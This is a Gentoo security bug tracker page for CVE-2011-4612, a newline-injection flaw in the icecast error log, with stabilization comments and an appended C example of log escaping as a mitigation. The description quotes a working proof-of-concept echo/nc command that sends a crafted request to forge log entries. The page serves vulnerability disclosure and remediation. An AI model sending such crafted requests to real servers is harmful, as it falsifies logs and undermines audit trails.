Bug 394847 (CVE-2011-4612)

Summary: <net-misc/icecast-2.3.3: new line injection into log (CVE-2011-4612)
Product: Gentoo Security
Reporter: Petr Pisar <petr.pisar>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: minor
CC: barzog, hwoarang, sound
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
Whiteboard: B4 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 430434
Bug Blocks:

Description Petr Pisar 2011-12-15 19:08:02 UTC
Jamie Strandboge <jamie@canonical.com> reported to the icecast developers (CCing <oss-security@lists.openwall.com>) the possibility of injecting a fake message into the icecast error log via a specially crafted HTTP request sent to the icecast server port, discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
> /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815

Upstream responded that a fixing version, 2.3.3, would be released soon.
Comment 1 Tim Sammut (RETIRED) gentoo-dev 2011-12-15 20:54:20 UTC
Thanks for the bug, Petr.
Comment 2 Michael Harrison 2011-12-15 22:45:24 UTC
I was able to reproduce the fake log file with the same info as referenced here:
https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782

netcat must be installed of course
Comment 3 Oleg Gawriloff 2012-07-10 10:24:22 UTC
Any news? Because 2.3.3 is released.
Comment 4 Petr Pisar 2012-07-10 16:58:54 UTC
The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines
This is part of the patch-set addressing CVE-2011-4612.
Comment 5 Markos Chandras (RETIRED) gentoo-dev 2012-08-06 19:30:58 UTC
2.3.3 now in portage. I can only do limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.
Comment 6 Sean Amoss (RETIRED) gentoo-dev Security 2012-08-07 22:02:48 UTC
(In reply to comment #5)
> 2.3.3 now in portage. I can only do limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
=net-misc/icecast-2.3.3
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"
Comment 7 Andreas Schürch gentoo-dev 2012-08-08 11:59:13 UTC
I stumbled upon bug 430434.
Comment 8 Andreas Schürch gentoo-dev 2012-08-09 12:01:57 UTC
x86 done, thanks!
Comment 9 Brent Baude (RETIRED) gentoo-dev 2012-08-09 18:21:45 UTC
ppc done
Comment 10 Markos Chandras (RETIRED) gentoo-dev 2012-08-09 20:47:52 UTC
amd64 done
Comment 11 Raúl Porcel (RETIRED) gentoo-dev 2012-08-26 14:12:07 UTC
alpha/sparc keywords dropped
Comment 12 Kacper Kowalik (Xarthisius) (RETIRED) gentoo-dev 2012-09-18 10:09:50 UTC
+  18 Sep 2012; Kacper Kowalik <xarthisius@gentoo.org> icecast-2.3.3.ebuild:
+  ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit
+  RDEPEND

ppc64 stable, last arch done
Comment 13 Sean Amoss (RETIRED) gentoo-dev Security 2012-09-18 18:53:13 UTC
Thanks, everyone. 

GLSA vote: no.
Comment 14 Tim Sammut (RETIRED) gentoo-dev 2012-09-20 23:49:21 UTC
Thanks, folks. GLSA Vote: No, too, closing.
Comment 15 GLSAMaker/CVETool Bot gentoo-dev 2012-11-20 12:51:11 UTC
CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612):
  icecast before 2.3.3 allows remote attackers to inject control characters
  such as newlines into the error log (error.log) via a crafted URL.
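
The class of mitigation for the log injection described in this bug, as an added example: escaping control characters in request-derived text before it reaches the log, so one log call can only produce one physical line. This is not icecast's own r18355 patch, which this page does not show; log_escape, format_log_line and SAMPLE_PATH are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: the request path from the report (shortened), as it
 * looks after the server has percent-decoded %0d%0a into CR LF. */
static const char SAMPLE_PATH[] =
    "/non-existent\r\n[1970-01-01  00:00:00] PHUN I'm feeling phunny";

/* Copy src to dst for logging. Control bytes (CR and LF included) and DEL
 * become \xNN. Backslash is escaped too, so a literal "\x0a" sent by a
 * client cannot be mistaken for an escaped newline when reading the log.
 * Returns 0 on success, -1 if dst is too small. */
int log_escape(const char *src, char *dst, size_t dstlen)
{
    size_t o = 0;
    if (dstlen == 0)
        return -1;
    for (; *src; src++) {
        unsigned char c = (unsigned char)*src;
        int unsafe = c < 0x20 || c == 0x7f || c == '\\';
        if (o + (unsafe ? 4 : 1) + 1 > dstlen)
            return -1;
        if (unsafe)
            o += (size_t)snprintf(dst + o, 5, "\\x%02x", (unsigned)c);
        else
            dst[o++] = (char)c;
    }
    dst[o] = '\0';
    return 0;
}

/* Hypothetical wrapper: build the message text of the sample log line in
 * the report, but from the escaped path instead of the raw one. */
int format_log_line(const char *path, char *out, size_t outlen)
{
    char safe[2048];
    if (log_escape(path, safe, sizeof safe) != 0)
        return -1;
    int n = snprintf(out, outlen,
                     "INFO fserve/fserve_client_create checking for file %s",
                     safe);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    char line[4096];
    if (format_log_line(SAMPLE_PATH, line, sizeof line) == 0)
        puts(line);
    return 0;
}
```

With the escaping in place, the forged "[1970-01-01 ...] PHUN" text stays inside the original INFO entry as visible `\x0d\x0a` instead of starting a new line with its own timestamp.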